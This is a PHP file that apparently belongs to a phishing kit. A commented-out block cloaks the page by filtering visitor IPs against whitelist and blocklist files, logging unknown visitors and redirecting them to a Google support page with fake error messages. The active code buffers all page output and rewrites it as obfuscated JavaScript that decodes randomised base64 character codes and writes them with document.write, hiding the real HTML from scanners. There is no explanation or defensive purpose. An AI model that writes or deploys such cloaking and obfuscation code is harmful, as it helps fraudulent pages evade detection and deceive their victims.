<?php

// $userinfo = $_SERVER['REMOTE_ADDR'];

// $dwFile = explode("\n", file_get_contents(dirname(__FILE__) . "/whitelist.dat"));
// $vlad = dirname(__FILE__) . "/blocklist.dat";
// $vladPutin = explode("\n", file_get_contents($vlad));

// $userinfo = $_SERVER['REMOTE_ADDR'];
// if (in_array($userinfo, $vladPutin)) {
//    header("Location: https://href.li/?https://support.google.com/");
//    die("<b style='color:white'>INVALID DOMAIN</style>");
// };

// if (!in_array($userinfo, $dwFile)) {
//       $file = fopen($vlad, 'a');
//       fwrite($file, $userinfo . "\n");
//       fclose($file);
//       header("Location: https://href.li/?https://support.google.com/");
//       die("Invalid User session");

// };

function randomString($length = 3) {
      $randomString = '';
      $characters = implode("", array_merge(range('a', 'z'), range('A', 'Z')));
      for ($i = 0; $i < $length; $i++) $randomString .= $characters[mt_rand(0, strlen($characters) - 1)];
      return $randomString;
  }
  function Encode($output) { 
        $randomFunc = randomString();
      $randomOut = randomString();
      $randomNum = randomString();
      $randomVal = mt_rand(999999, 99999999);
      $return = '
  <script>var ' . $randomOut . ' = ""; var ' . $randomNum . ' = [';
      foreach(str_split($output) as $x){ $return .= '"'.base64_encode(randomString().(ord($x) + $randomVal).randomString()) . '", '; if (mt_rand(0, 1)){ $return .= "\n"; } }
      $return = rtrim($return, ', ');
      $return .= ']; ' . $randomNum . '.forEach(function ' . $randomFunc . '(value) { ' . $randomOut . ' += String.fromCharCode(parseInt(atob(value).replace(/\D/g,\'\')) - ' . $randomVal . '); } ); document.write(decodeURIComponent(escape(' . $randomOut . '))); </script>'  ;;
      return $return;
  }
  ob_start("Encode");
  
?>
